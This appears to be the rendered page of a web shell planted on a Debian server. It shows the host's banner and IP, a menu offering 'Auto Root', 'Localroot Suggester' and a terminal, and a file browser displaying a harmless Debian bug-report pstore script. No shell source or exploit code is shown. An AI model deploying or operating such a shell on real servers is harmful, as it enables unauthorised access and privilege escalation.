Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
bug /
linux-image-4.9.0-19-amd64 /
Delete
Unzip
Name
Size
Permission
Date
Action
control
430
B
-rw-r--r--
2017-06-05 14:50
include-0version
106
B
-rw-r--r--
2017-06-05 14:50
include-1cmdline
111
B
-rw-r--r--
2017-06-05 14:50
include-1tainted
1.8
KB
-rw-r--r--
2017-06-05 14:50
include-dmesg
688
B
-rw-r--r--
2017-06-05 14:50
include-model
1.34
KB
-rw-r--r--
2017-06-05 14:50
include-modules
330
B
-rw-r--r--
2017-06-05 14:50
include-network
1.02
KB
-rw-r--r--
2017-06-05 14:50
include-pci
257
B
-rw-r--r--
2017-06-05 14:50
include-pstore
1.46
KB
-rw-r--r--
2017-06-05 14:50
include-usb
251
B
-rw-r--r--
2017-06-05 14:50
info
141
B
-rw-r--r--
2022-06-30 20:26
presubj
447
B
-rw-r--r--
2017-06-05 14:50
script
1.01
KB
-rwxr-xr-x
2017-06-05 14:50
Save
Rename
_add_pstore_log() { if [ $# -le 3 ]; then return fi local backend="$1" local event="$2" local date="$3" yesno "Include log of $event at $(date -d @$date +%c) stored by $backend?" yep if [ $REPLY != yep ]; then return fi echo >&3 echo "*** Log of $event at $(date -d @$date -Iseconds) from $backend" >&3 shift 3 for file in "$@"; do tail -n +2 "$file" | sed 's/^<.>//' >&3 done } add_pstore() { local backend local i local j local file local date local head local event local log_files if ! mountpoint -q /sys/fs/pstore; then return 0 fi set -- /sys/fs/pstore/dmesg-*-1 backend=${1#*/dmesg-} backend=${backend%-1} if [ "$backend" = '*' ]; then return 0 fi i=1 while [ -f /sys/fs/pstore/dmesg-$backend-$i ]; do file=/sys/fs/pstore/dmesg-$backend-$i head="$(head -1 "$file")" # Is this the first part of a log? if [ "x${head% Part1}" != "x$head" ]; then # Flush previous log, if any _add_pstore_log "$backend" "$event" "$date" $log_files event="${head% Part1}" date=$(stat -c %Y $file) log_files= j=1 fi if [ "x$head" = "x$event Part$j" ]; then # Each part is prepended to the list, because they're numbered # backward in log history log_files="$file $log_files" j=$((j + 1)) fi i=$((i + 1)) done # Flush last log, if any _add_pstore_log "$backend" "$event" "$date" $log_files } ask_pstore() { add_pstore }